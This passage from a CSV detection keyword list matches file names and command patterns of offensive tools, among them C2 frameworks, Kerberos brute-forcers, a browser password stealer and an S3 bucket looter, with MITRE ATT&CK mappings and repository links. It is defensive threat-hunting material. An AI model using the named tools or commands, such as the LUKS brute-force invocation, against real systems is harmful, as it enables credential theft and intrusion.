- TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*BrowserListener.py*,offensive_tool_keyword,responder,LLMNR. 
NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*Browser-password-stealer.git*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,1,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*Browser-password-stealer-master*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,1,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*browserpivot *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - 
APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*brun_script_in_mem*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*brunasadmin*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Brute/Brute.cs*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Brute/Brute.csproj*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Brute/Brute.sln*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*brute_force_ntlm.sh*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*bruteforce *.txt*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,0,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*Brute-force Unsuccessful!*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*bruteforce.go*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*BruteForce.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*BruteforceCLSIDs.*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*bruteForceCombos*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,0,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*Brute-force-Instagram-*.git*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/insta-bf,1,1,N/A,7,1,39,6,2021-12-23T17:41:12Z,2020-11-20T22:22:48Z -*bruteforce-luks -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*bruteforce-luks -t 4 -l 5 -m 5 /dev/sdb1*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*bruteForceUser*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*bruteForceUser*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,0,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*bruteloader*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*brute-locadmin *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*brute-ratel-*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - 
T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*BruteRatel*.tar.gz*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*BruteRatel*.zip*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bruteratel.com/*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bruteratel/*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - 
T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Brute-Ratel-C4*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Brutesploit.git*,offensive_tool_keyword,BruteSploit,BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text,T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/BruteSploit,1,1,N/A,N/A,7,665,261,2020-04-05T00:29:26Z,2017-05-31T17:00:51Z -*BruteSploit/wlist/*,offensive_tool_keyword,BruteSploit,BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text,T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/BruteSploit,1,1,N/A,N/A,7,665,261,2020-04-05T00:29:26Z,2017-05-31T17:00:51Z -*brutespray*,offensive_tool_keyword,brutespray,BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.,T1110,TA0001 - TA0043,N/A,N/A,Credential Access,https://github.com/x90skysn3k/brutespray,1,1,N/A,N/A,10,1771,378,2023-03-15T23:00:29Z,2017-04-05T17:05:10Z -*BruteStager.csproj*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*BruteStager.sln*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*bruteuser.go*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*bruteuserCmd*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*BruteX*,offensive_tool_keyword,BruteX,Automatically brute force all services running on a target. Open ports. 
Usernames Passwords,T1110,TA0007 - TA0008 - TA0009,N/A,N/A,Credential Access,https://github.com/1N3/BruteX,1,0,N/A,N/A,10,1713,562,2023-08-16T04:00:18Z,2015-06-01T22:28:19Z -*bshinject*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bshinject*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bshspawn*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bsteal_token*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 
- T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bsteal_token*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bucketloot -*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,0,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*bucketloot https://*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,0,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*bucketloot.exe -*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,0,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*bucketloot.exe https://*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - 
TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,0,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*bucketloot-darwin64*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,1,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*bucketloot-freebsd64*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,1,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*BucketLoot-master*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,1,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*bucketloot-openbsd64*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - 
